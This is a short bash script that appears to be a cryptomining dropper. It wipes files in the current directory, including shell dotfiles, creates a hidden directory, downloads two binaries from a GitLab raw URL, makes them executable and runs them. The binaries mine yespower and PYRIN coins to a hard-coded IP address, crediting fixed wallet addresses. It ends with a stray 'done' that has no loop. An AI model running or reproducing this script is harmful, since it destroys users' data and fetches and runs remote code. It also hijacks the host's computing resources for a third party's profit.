#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u ukkcroyFQ1qY6ZrdRh8ToeShu1Uk7D31Ah.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lol1.81
chmod 777 lol1.81

./lol1.81 -a PYRIN -p 138.197.98.18:80 -u pyrin:qq793yqj26gca8n2lj7ff7w80rylvuxp02qy0vaqw0sx5u9hq9hjs0c8kdrj4.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
